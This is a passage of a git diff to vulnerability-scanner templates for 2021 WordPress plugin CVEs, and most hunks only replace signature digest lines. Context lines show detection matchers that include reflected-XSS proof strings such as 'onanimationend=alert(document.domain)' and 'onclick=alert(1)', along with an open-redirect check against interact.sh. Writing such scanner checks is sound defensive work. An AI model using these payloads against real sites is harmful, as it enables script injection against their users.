b/http/cves/2021/CVE-2021-24370.yaml index b1b03854b8c..1524fd0b4e5 100644 --- a/http/cves/2021/CVE-2021-24370.yaml +++ b/http/cves/2021/CVE-2021-24370.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206354252819ee981be76d45de905bff9c917d45f92fa8614d155f94e04bd286500220572f1adca52665def35282da448ee05fba7cc14c3dd1b9b25f86b1ce52de2c13:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bbea4ed544a59587e5cae390e6e00090f697b3cea7e2b8694cb4483349b724210220312049e89f435237e09fb4a25907ebccc51e094b86d5d5c521d3d890c02b7a4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24387.yaml b/http/cves/2021/CVE-2021-24387.yaml index f7055c12685..1270305213d 100644 --- a/http/cves/2021/CVE-2021-24387.yaml +++ b/http/cves/2021/CVE-2021-24387.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ec3d3eec904194c340bba387d1fcf96bc32ad72d3b770efa5fb7e2f5aeda128502205d14c85399096e21506edad7cafedc209aafb24accfde79ed9348dd5021afe74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204f76b73a29e7fb71a182bc5da8d2de0a1c65277a6d2531b672a75612f29f81a7022100e39d389c26d4cd246254696de65194164c25b527bb9758cebeb6568a75e37093:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24389.yaml b/http/cves/2021/CVE-2021-24389.yaml index 3fd726684ab..89f69d336e6 100644 --- a/http/cves/2021/CVE-2021-24389.yaml +++ b/http/cves/2021/CVE-2021-24389.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d20742ffaeaba2ec9009b311679e8d043cbb0cc6c93bc04ca96583a4d7efe3d8022100a6b263967c01fe5580102cc94ae002421e614822946babe1c9b7852618ace571:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d268cbf6db688000dadced6618b4dedfa5bf5b5a57444d8c4d7f44e108968c65022100e1f0d4bafb4aa54a1a1259417f71be1ca34ebe61f98c6ca9fc0418f14a734458:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24406.yaml b/http/cves/2021/CVE-2021-24406.yaml index f89b43bfccb..dcece761b9c 100644 --- a/http/cves/2021/CVE-2021-24406.yaml +++ b/http/cves/2021/CVE-2021-24406.yaml @@ -39,4 +39,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4a0a004730450221008c020115278d47c6e7946f8426b1fb10ebf51fecd23f0a85f61c0a020406f1fd022057e5329bfdbd228726825d5eac3ec315e0fcc8fc8d44b8342a16021887c9a7c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009fda2a63051ea7743cdab15c0252fa7bda54cd238486c1910d2f4c04b482eacd022100a218d4a200374708ed387b0b27a8d53eb20c48a2bb883b621d69eebf9f25fd19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24407.yaml b/http/cves/2021/CVE-2021-24407.yaml index 008ca133917..f3cb8dbf1c7 100644 --- a/http/cves/2021/CVE-2021-24407.yaml +++ b/http/cves/2021/CVE-2021-24407.yaml @@ -66,4 +66,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008ce52632576b6ddb7168739575c6a15ad4fdefbd41bd3a1dcd4cef83b543301a02206e1dc8c4b16f80ebfd302af5c7c3445d24e810003803961fedd40b942320ec3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e4a2437ff356bd07abbdd031113b7b1cde6a10a83957b3b2116e7a7a0d15caf402206c467f8c7641ed2bdcccb8dd43a822451fd809e97e165fe65d68f4423af173a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24409.yaml b/http/cves/2021/CVE-2021-24409.yaml index 3c2fcea67e6..c01ebd136f1 100644 --- a/http/cves/2021/CVE-2021-24409.yaml +++ b/http/cves/2021/CVE-2021-24409.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, "Leave A Review?")' - 'contains(body_2, "onanimationend=alert(document.domain)")' condition: and -# digest: 4a0a0047304502204b2ff4b287013f6b349980cc81e3dfc49d02848c3d244c4e1e8cdd17babc8ca0022100c0886eefd02754da7e36e999725c4d095b3651b5d7f5c96c5f2616593bca3c59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d31929059626ad702ef96e06bd6fe3b632965988419ff2b900ed38b106a8c21f02206b8593ad1892d2f62bf13d01bb6defa59f56470a35d3708584b79d1595e71ace:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24435.yaml b/http/cves/2021/CVE-2021-24435.yaml index a20669bf50d..06589e64ffa 100644 --- a/http/cves/2021/CVE-2021-24435.yaml +++ b/http/cves/2021/CVE-2021-24435.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ccbf12f545dfd515a9f20956c2da277096b4282e23103d44ff339ea0c8146aa8022031a95bdfd887beee72c0a9cdb286c19257f45c08821d30b7a921012a81923244:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e6272dd524f105b7181b1810240d53ec021fe3834bfaa3dd024554f42d9ebbd502200a4f2eadd57b4aeb6921e11728cf3c738fbfc8a789c632e14dfc0279529ca9f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24436.yaml b/http/cves/2021/CVE-2021-24436.yaml index 745b9dfeee1..c6cea74c061 100644 --- a/http/cves/2021/CVE-2021-24436.yaml +++ b/http/cves/2021/CVE-2021-24436.yaml @@ -50,4 +50,4 @@ http: - contains(body_2, '>&action=view') - contains(header_2, "text/html") condition: and -# digest: 490a0046304402200d1b3c0689b111859215be0d077cd6bb75d973389705941cbfb512932a8d14f9022025e7ef3d5aaeaae9b761be2e84d5da59755cd80e76e8d66012563c5af17dc7a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a01273d622d2292d41434ee4fae157d7469ac92507678cd7fd2749d620288e3d0221009e37ef3bf424e3e35dab6206357cf10c95d50bc40fa3ba80e1b6df4a31c44281:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24452.yaml b/http/cves/2021/CVE-2021-24452.yaml index c3f01844ed0..304f4417a31 100644 --- a/http/cves/2021/CVE-2021-24452.yaml +++ b/http/cves/2021/CVE-2021-24452.yaml @@ -48,4 +48,4 @@ http: - contains(body_2, 'extensions/\'-alert(document.domain)-\'') && contains(body_2, 'w3-total-cache') - contains(header_2, "text/html") condition: and -# digest: 4a0a00473045022100d749eeb01c2e97e78c32d691baeb2b4c664f1f24f3eaf3e3142f78a8c970f1330220692c49115cb390d14f4efa02bd5d9c3fac3e0e3f6c887ecbd35f9ef432b195f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204601df4bcde0c05be3b369cf28cb3ce839d8d36db355cddfd06601c59ecf78d402203282458149b2568f6f18f626003112e8fa983f1bb94df9e911ec27b0450f72ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24472.yaml b/http/cves/2021/CVE-2021-24472.yaml index 590297051ea..6ca8b4cd842 100644 --- a/http/cves/2021/CVE-2021-24472.yaml +++ b/http/cves/2021/CVE-2021-24472.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e2c981fe1787cf2aae4b68e84d49de6f1fe7f97dbbdebd09a94ff98edef082f002210080d6d9aff8b6e078f564008cc112e7f0dbb2efd6f1f490dceab24761fc966a3a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203c46863d261bfe29e1b139bcc25c0fb1ee57742e180136614738729f92cfc42d02210092bbe4570116d168d1c33a305b5d95d30ed796464b4307d050d0d0274eed0a75:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24488.yaml b/http/cves/2021/CVE-2021-24488.yaml index 68776740810..c8191232b81 100644 --- a/http/cves/2021/CVE-2021-24488.yaml +++ b/http/cves/2021/CVE-2021-24488.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220231b67eb557c62a5e71e5eba4994f5f31778c38c61b704f65fce541c86326f7d0220347c729dba48f6b8bd4a439f6846f4214880472f1b97f3b2d6bbddce96299bc1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210086d5d8f0ee44fedf01f2da54025cf4d3a7d442d206aae877cbb725ba6fb9e820022100f0a703ebb75aa208d68838b5658a9c189b82c81cfddaf56f391be45eb4771969:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24498.yaml b/http/cves/2021/CVE-2021-24498.yaml index 3a575b4b430..2567efa857c 100644 --- a/http/cves/2021/CVE-2021-24498.yaml +++ b/http/cves/2021/CVE-2021-24498.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207f66a648c7c93a86c0fd78a00dd0d4da38456781f9112954c4f49ceac0681b28022100e95af704cb60faa0ecc94d7376f991122ca9e3dd068c0e06d950ae6ab0d8ea58:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205a9e1348843ff735cd04b6c75c8025e17bfbd5b34e9df8d59979ae405cf5d82e02203fadc95635050f3069bb8b1a341ed50c5c4d536631382f78a3d3ac85dca8657e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24522.yaml b/http/cves/2021/CVE-2021-24522.yaml index 4730e1808bc..a30d8755c4e 100644 --- a/http/cves/2021/CVE-2021-24522.yaml +++ b/http/cves/2021/CVE-2021-24522.yaml @@ -68,4 +68,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100fb4b027f44ee11569ed32be96130c9fc7e758195c2390498d40ba600a18e17320220109a9ecbde9f2525034215ee6e71724a1f38f9719ca14677c80c05090dbd4a78:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cba9536aa65a4053b22fd8fc3f73b3f391587f5bdd286613dc2d5c5414cdd7ba02203afd1dc2bbd4529e1311fb566c08d4961c5ca3344ee492311074cdd2ca20883a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24554.yaml b/http/cves/2021/CVE-2021-24554.yaml index f4eed0bb907..b4538f4ddc9 100644 --- a/http/cves/2021/CVE-2021-24554.yaml +++ b/http/cves/2021/CVE-2021-24554.yaml @@ -53,4 +53,4 @@ http: - 'contains(content_type_2, "text/html")' - 'contains(body_2, "paytm-settings_page_wp_paytm_donation")' condition: and -# digest: 4a0a0047304502204709f4c8d2edee6200f91109845b832d5147569fcffae8bb9b43c70caf5b62310221009023b9d5a7fbc71a13d3183d18f2e482cd2d937538753842be895e945942d6a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202374a33981dc687453645fe1a51930f1ea99dffde35cb624b7053433e02fb570022100eb75c3399f633355886c155226ac7c4536065b2b1cbeb923d243d3b886eb903e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24627.yaml b/http/cves/2021/CVE-2021-24627.yaml index e24355984d8..afb804a3638 100644 --- a/http/cves/2021/CVE-2021-24627.yaml +++ b/http/cves/2021/CVE-2021-24627.yaml @@ -66,4 +66,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220413c9c06fb55f6a46c56e4f5728d8fa2aaa0abc10e9847e7c4634e99a25eb65b022100c133da777e0ddfee31a4091214d374a0609d7270c92bf935db75bb47cae38a93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220147558a12c1b64f0cedc85024f74fa23f81d2b449f4d6907770c6850eb920258022058b9d02bf720904fb16a5ee25498935dfdf57b4f7fd2e80e2a79f70ef0ed3590:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24657.yaml b/http/cves/2021/CVE-2021-24657.yaml index 5b7cd3fb18c..9e6d51a6c19 100644 --- a/http/cves/2021/CVE-2021-24657.yaml +++ b/http/cves/2021/CVE-2021-24657.yaml @@ -75,4 +75,4 @@ http: - 'status_code == 200' - 'contains_all(body, "login_reports", "{{rand}}", "")' condition: and -# digest: 4a0a00473045022064c5c6f7f406ebd24053c708eaca3408eb77492549c41f3b4f0ae32db0ff4c2d02210096940256612e0b7283e2b2b28611b3fcc9246e59daeb2c8fe722386df3d1926e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c2614119d956d398a4c8deff60856a8ea4740ffda64c670923c8acd2ad211714022100e42d34bd7dbc01ef35e4eb675326224a2c7ef123a6606de3f83df885c6afca11:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24666.yaml b/http/cves/2021/CVE-2021-24666.yaml index c60f532b778..6a0827adb2d 100644 --- a/http/cves/2021/CVE-2021-24666.yaml +++ b/http/cves/2021/CVE-2021-24666.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022042033097d0024b0f6e9e2b6f8c0d5b73cf08a027cb6d1e7cb8839ad7f470e63a022100cb7691df76b92584b4f921647b14643321436226523a467a6824352863f1e145:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203b83dd4e739d90aa9e623af2328a8eec3d141dc3c5b48efbf4c87c67ef226f17022100fd4530d8f2816f4c2924b8b1f6979fc05a4857c92940c48d7fc32c8346fe9934:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24681.yaml b/http/cves/2021/CVE-2021-24681.yaml index 29639d16cca..2e89c3a8e90 100644 --- a/http/cves/2021/CVE-2021-24681.yaml +++ b/http/cves/2021/CVE-2021-24681.yaml @@ -89,4 +89,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "duplicate_post_suffix", "\">")' condition: and -# digest: 4a0a00473045022100ab23ad31a0103e0a0c444f5f13404746feea87b6d5e2929eccb9c1f32e52072b0220345fb859d5156297980f009337216ed19d93dc3217016c2f370a1cb7d188bc87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203371ad6eac0e0b513e0d9974144ee16f02fc4e5d025dc270443da056ac8400400220674158bf6118e6be8eaf0035c17ddf95fcde1e6d09399483220ba2cabed6d5dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24731.yaml b/http/cves/2021/CVE-2021-24731.yaml index b7a78304c52..a5fbbba9740 100644 --- a/http/cves/2021/CVE-2021-24731.yaml +++ b/http/cves/2021/CVE-2021-24731.yaml @@ -47,4 +47,4 @@ http: - 'contains(content_type, "application/json")' - 'contains(body, "User credentials are invalid.")' condition: and -# digest: 4a0a0047304502200d1b88c166b04a094bf6e068005c6dac3d7e39c10728ae4405e93b611258456d022100e72cb80c5430ea95c13d36ba1b1d4af0049d9a2d22e2c8f454cbef9ffacce16a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009957dd2bb9dc1ecfe1d69b42171c97217c8ac24f77148b665261d6ccc14f1e6202210082ac08cb285f9cad15741bbd69890a19d907b93019b456af2ca85acf41309d15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24746.yaml b/http/cves/2021/CVE-2021-24746.yaml index 4f0b593dbf0..1880c020521 100644 --- a/http/cves/2021/CVE-2021-24746.yaml +++ b/http/cves/2021/CVE-2021-24746.yaml @@ -62,4 +62,4 @@ http: - '"slug":"([_a-z-A-Z0-9]+)",' internal: true part: body -# digest: 4a0a00473045022100a109aed1424a2d76efed5ffef809e1418a82c7c8566035c343653dcf1b498e6402207433ca9a9853273428c80851c6d605b9daa5f073d8b676e4386a74ce2de63861:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100eeda3bab17c25fc21c4127ab66440fddfc47fde7733f8487c4f54f0e12d9f73002200b3bcfb8570897c62d3525aa8862182dff0ec2468e38965215e4c00185fa5853:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24750.yaml b/http/cves/2021/CVE-2021-24750.yaml index 99dea07ef50..28735fc4db1 100644 --- a/http/cves/2021/CVE-2021-24750.yaml +++ b/http/cves/2021/CVE-2021-24750.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008871207cb1db30ad56cd8f3783a956b69bfbb178d6f926aad1234bc12b9f906d02201bd1406c193c2c496865ba48511287fec203054a223f252860640235ff3cb03b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022032bedd957dba28a8c685193266a79b89f132e035ce1d0db7b0325f6c3f164304022075d1cc818d73b1e3df05b21aa25a390c46871ea361759db39f5a79955208b64a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24762.yaml b/http/cves/2021/CVE-2021-24762.yaml index c70c92224c6..07014027233 100644 --- a/http/cves/2021/CVE-2021-24762.yaml +++ b/http/cves/2021/CVE-2021-24762.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 404 -# digest: 490a00463044022064e84e867b3f8f37389c514f232d2c93392530830f9179d3316e25a425fe09310220343ff38f3ce994287a4700ec8ec244b50913494aa519f6761ae1e3b85394b5b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100af3dd24151ec1a5d646b362c5f8a5c7c3e8b5f2a6454acf35f82c1d0999532fb022100dbfae9afd1575dea33decae2535eba6e9d63cdbcfd5bfb12b9ce4665a6739e05:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24791.yaml b/http/cves/2021/CVE-2021-24791.yaml index f477ed25dca..afc6193b9aa 100644 --- a/http/cves/2021/CVE-2021-24791.yaml +++ b/http/cves/2021/CVE-2021-24791.yaml @@ -51,4 +51,4 @@ http: - 'contains(content_type_2, "text/html")' - 'contains(body_2,"Add New Snippet")' condition: and -# digest: 4a0a0047304502201347dcf64e810066e668f2c902d318404d5df6a62e7e2f5d02cca2681b7e62e30221008c449434429b721f0944a6e284d3bc023f5a21259c92b5730bdba68c91d0f438:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c5d81b7e90aeff7042937a6d969aada267671ebc1e7ed56d0c5a21a72ec86b5902203401c70b54668e27af00fffe67dd64b23f4894465364a8925fa5c4d0f975472c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24838.yaml b/http/cves/2021/CVE-2021-24838.yaml index 90a7a79e339..1866cff73ec 100644 --- a/http/cves/2021/CVE-2021-24838.yaml +++ b/http/cves/2021/CVE-2021-24838.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 302 -# digest: 4a0a004730450221009fdf76333fe3c01065e4fb9a227e91808f429002f592cba79408c6efd5d02f9102202228a27d2fb925ee38b6cf728aef7e85a0ba1c0eb2797f2dc0c4f241240c1a8f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201704045d5068b54ddee515f7df98b74f9b0a088b1441e197b8b215fd3706a48b022100fff3d5caba3bc71c29fdc2a160d40142c6e915c8ac1f1d2d610537b62aed838f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24862.yaml b/http/cves/2021/CVE-2021-24862.yaml index e14af4ef5da..5116cc64664 100644 --- a/http/cves/2021/CVE-2021-24862.yaml +++ b/http/cves/2021/CVE-2021-24862.yaml @@ -54,4 +54,4 @@ http: - 'status_code_2 == 200' - 'contains(body_3, "rm_user_role_mananger_form")' condition: and -# digest: 4b0a004830460221008be23cdd32c5d2a74d8d11cfe34938eb2084a1f328e2ecad14b2ffa9d95193d70221008da860120c69ad131f970a77cf5b3a7cdf3500ba30232e8d99ad1ac6695479b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d53a4fd3b3138dfec8a709064c5f698718e123c7351455c8d8e46a2ad8bbc53902204b2f74f0245314d2e713332697d452fbd9a4a52428a5be68bef2ac3d763de075:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24875.yaml b/http/cves/2021/CVE-2021-24875.yaml index deefe6ed76f..ce4ff4b6969 100644 --- a/http/cves/2021/CVE-2021-24875.yaml +++ b/http/cves/2021/CVE-2021-24875.yaml @@ -49,4 +49,4 @@ http: - 'contains(body_2, "alert(document.domain)")' - 'contains(body_2, "eCommerce Product Catalog")' condition: and -# digest: 490a00463044022044451ff7dc7f3b4f69c3362647e22a5bf951723469187b4ea6e4b6c4aab3dc16022075546e3ec553c9f6111c55b9ba6d402b762ba1c52e06e2c4ba39367517ad6e82:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ae012ad7be5022dbe81f7a744d6979cc612546de006c6a90bb974f7ddb5f6212022100b0f5886212555a2ac6c553de2d43a04beb3ddf07a53a0fc25769f7586ccd6172:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24876.yaml b/http/cves/2021/CVE-2021-24876.yaml index a3150942bfe..b3b47cc47ff 100644 --- a/http/cves/2021/CVE-2021-24876.yaml +++ b/http/cves/2021/CVE-2021-24876.yaml @@ -59,4 +59,4 @@ http: - 'contains(content_type, "text/html")' - 'status_code == 200' condition: and -# digest: 490a004630440220068de6896301bfa2c6a9c469d68b7dcf43aa6ff63f55f6e53fbc1246ca72d21d02207c6481340ff62b63c6d20589e6be15d8e2061f5be3e02cb95308229ae05ee2fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022055c1161826331f81a2b88defab44e7a2a9691cf01d3205b2505423cc81d23cc1022017ba2799418616fd6b9fa825881687d37e2bdac4f33cef17d923feefa5b49b36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24878.yaml b/http/cves/2021/CVE-2021-24878.yaml index 04208bbc534..4dc3a11f311 100644 --- a/http/cves/2021/CVE-2021-24878.yaml +++ b/http/cves/2021/CVE-2021-24878.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206fb5ffa04fe1e925f429df8c7e9a9d9c9866394f441efbe30c403c51e593c382022100c69594a88356faad86d871f23fe1e806b864fffd8a7089503ca59e0d6aa8a228:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207dcf9113153ca16e90989e7d0f5782c10d0cdb3c440dd6e2c81b9bf140ebe999022100ad836de993f660971e5d5e52f09ef1676162b90615522f1fd8265330dfa2d5ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24891.yaml b/http/cves/2021/CVE-2021-24891.yaml index 724eef3ad60..6532fc254f7 100644 --- a/http/cves/2021/CVE-2021-24891.yaml +++ b/http/cves/2021/CVE-2021-24891.yaml @@ -70,4 +70,4 @@ http: - type: kval kval: - version -# digest: 490a0046304402203fe8123c1828977df86148a904e911ac3f8080c865b3f019460a9ea9f3b2eb12022000ec11fd5f46660f30f44b7a7763fcb0739a1e3b76c71abf60ffa2a251c415ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022002d63ae9b6a07646457738b8121ee539c2fea5988b5dd731f6cf0171d9f8ec01022100ced27b8eaf5df1b771b7ef46486cb4d57c920f4d19d3fa8cb539d7d03fea36d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24910.yaml b/http/cves/2021/CVE-2021-24910.yaml index 4c740854791..71e67d91b00 100644 --- a/http/cves/2021/CVE-2021-24910.yaml +++ b/http/cves/2021/CVE-2021-24910.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022049f8fa88c0fbe167486a88b6257fb59a65dae8c520b34a7a4f2588c2103b18010221009b88647e9dfc879351ba52d103a1f0a4138247a67d327183fce5b0b39fe9c309:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008472be65bffc1f8349a25fbde44f513ed5f893c53e84077d0321d032c32db7e50221008856f46df1470bf0c250402f22782e10cee312455d3c6f8fbe5dcdbecbf05ffb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24917.yaml b/http/cves/2021/CVE-2021-24917.yaml index ed05ffd224f..0182bb1a046 100644 --- a/http/cves/2021/CVE-2021-24917.yaml +++ b/http/cves/2021/CVE-2021-24917.yaml @@ -52,4 +52,4 @@ http: - type: kval kval: - location -# digest: 4a0a0047304502202b2c85f7a89240aa3827b75ea18ea49e24c035b3d78685c5a4ed5104dfc0c873022100b81490d145c51646a2aaa6d535b08af557dbf1be9580237d3756b9865d195291:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205310f0f12663437f508b6b7687162ffc676af895f06a1e0287d6c6fc821b7f9e02203f92501388be55e9d65140dd41fba2dd16ab702933a60d10f8fef5f3bb83f7f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24926.yaml b/http/cves/2021/CVE-2021-24926.yaml index 4ffdf142b48..799fb252443 100644 --- a/http/cves/2021/CVE-2021-24926.yaml +++ b/http/cves/2021/CVE-2021-24926.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205a7c54397b922c702ee01f76f03871c13babf0ff8155e7c5157766e0dae852fa022100dc4314dfe32ae765f64ce87b87e0eda2fb442a5e40216ba1be55e2b819a8e9f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e510cfea27464e2f29d168fc58fa9665075769124993c04526d37c63989fb76002201087534fcca6ea775d0a015a0b025c3d0ce76b39aa949404f71ebcd59b3541e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24934.yaml b/http/cves/2021/CVE-2021-24934.yaml index a987c79b4a3..f7067590cba 100644 --- a/http/cves/2021/CVE-2021-24934.yaml +++ b/http/cves/2021/CVE-2021-24934.yaml @@ -49,4 +49,4 @@ http: - 'contains(content_type_2, "text/html")' - 'contains_all(body_2, "", "yellow-pencil-iframe-data")' condition: and -# digest: 490a0046304402203bb9a8531e6e6a3f0b5a4f83cfa080a5d731775a8ab50836ae1a14bf3f52aa490220217f1b9d946ddbfb9e5874bc56c31a3932cf56a9a959cfa55435561242a5b39e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cc75a380d5fd479d695b67772f1693b7fad3197e0a2d2f53dc80999e3982d364022100bd9e847cd3bdf7a7c5935433387c3ef319dd7693c29b9f86d4347c530b55b786:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24940.yaml b/http/cves/2021/CVE-2021-24940.yaml index 282358598a9..a6fac5563ca 100644 --- a/http/cves/2021/CVE-2021-24940.yaml +++ b/http/cves/2021/CVE-2021-24940.yaml @@ -50,4 +50,4 @@ http: - contains(body_2, 'accesskey=X onclick=alert(1) test=') - contains(body_2, 'woocommerce_persian_translate') condition: and -# digest: 4a0a00473045022018fbd93fa42bd426aed5938bebe0062e849f546876191622d269b75ee2708fdc0221008ce86c7834e3addc417c737d0facb2d3355a373b43f4fb9e4a7aa3816754fe44:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220478b822622d21fdb3b2f1353f955392c26d1301fe4c2ffed38e771b2c8736481022100a4a79b32077f77c1e29ff754997574af0a3907a7f7ff14e90a34d2684d176a62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24943.yaml b/http/cves/2021/CVE-2021-24943.yaml index 61a097b10f6..bb8a613c134 100644 --- a/http/cves/2021/CVE-2021-24943.yaml +++ b/http/cves/2021/CVE-2021-24943.yaml @@ -51,4 +51,4 @@ http: - 'status_code == 200' - 'contains(body, "Please enter the email you registered with")' condition: and -# digest: 4b0a00483046022100e58a86a63c2c24c975c953ba510d8a1d9130105654c9142e2a00e7660c4171f6022100d62666414ae37369e81f16843868a3bc4e1f9de70fd4aca6fb3ef2e300bee0f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b471e12b5d620efdbd990394553bb1b9338c298377655866e0ad17e997987d7a022100ce11812fe7f56eb04da83130a3c1dc72d79535c49665c1ea143822c55a411764:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24946.yaml b/http/cves/2021/CVE-2021-24946.yaml index fb1ea955e5c..1307d99440f 100644 --- a/http/cves/2021/CVE-2021-24946.yaml +++ b/http/cves/2021/CVE-2021-24946.yaml @@ -47,4 +47,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "The event is finished") || contains(body, "been a critical error")' condition: and -# digest: 